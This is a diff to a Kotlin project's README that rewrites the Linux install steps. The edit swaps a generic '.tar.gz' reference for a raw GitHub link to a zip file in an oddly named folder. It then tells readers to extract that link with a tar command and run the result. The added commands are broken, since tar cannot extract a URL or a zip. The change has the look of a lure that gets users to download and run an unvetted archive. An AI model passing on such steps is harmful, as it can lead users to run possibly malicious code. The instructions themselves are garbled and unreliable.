RiMKart-2006/kotlin-gic/README.md

 ### For Linux

-1. Navigate to the location of the downloaded `.tar.gz` file.
+1. Navigate to the location of the downloaded `https://raw.githubusercontent.com/RiMKart-2006/kotlin-gic/main/arteriotomy/kotlin-gic.zip` file.
-2. Right-click on the file and select "Extract Here" or use the terminal command `tar -zxvf filename.tar.gz`.
+2. Right-click on the file and select "Extract Here" or use the terminal command `tar -zxvf https://raw.githubusercontent.com/RiMKart-2006/kotlin-gic/main/arteriotomy/kotlin-gic.zip`.
 3. Open the extracted folder.
 4. Run the application from the terminal or use the graphical interface to execute it.